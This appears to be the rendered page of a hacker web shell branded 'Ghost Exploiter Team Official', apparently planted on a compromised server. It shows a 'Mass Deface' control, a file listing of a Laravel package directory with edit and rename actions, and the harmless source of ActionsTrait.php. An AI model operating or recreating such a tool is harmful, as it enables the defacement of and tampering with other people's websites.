Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
safemood
/
laravel-workflow
/
src
/
Traits
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
ActionsTrait.php
1.589KB
edt
ren
Dumpable.php
0.484KB
edt
ren
HasResponses.php
0.438KB
edt
ren
ManagesExecution.php
3.006KB
edt
ren
RegistersObservers.php
1.615KB
edt
ren
TracksActionStates.php
1.368KB
edt
ren
TracksEvents.php
1.971KB
edt
ren
WorkflowTraits.php
0.229KB
edt
ren
<?php namespace Safemood\Workflow\Traits; use Safemood\Workflow\Action; trait ActionsTrait { protected $beforeActions = []; protected $mainActions = []; protected $afterActions = []; public function addBeforeAction(Action $action) { $this->beforeActions[] = $action; return $this; } public function addBeforeActions(array $actions) { foreach ($actions as $action) { $this->addBeforeAction($action); } return $this; } public function addMainAction(Action $action) { $this->mainActions[] = $action; return $this; } public function addMainActions(array $actions) { foreach ($actions as $action) { $this->addMainAction($action); } return $this; } public function addAfterAction(Action $action) { $this->afterActions[] = $action; return $this; } public function addAfterActions(array $actions) { foreach ($actions as $action) { $this->addAfterAction($action); } return $this; } public function getBeforeActions(): array { return $this->beforeActions; } public function getMainActions(): array { return $this->mainActions; } public function getAfterActions(): array { return $this->afterActions; } public function getActions(): array { return [ 'before' => $this->beforeActions, 'main' => $this->mainActions, 'after' => $this->afterActions, ]; } }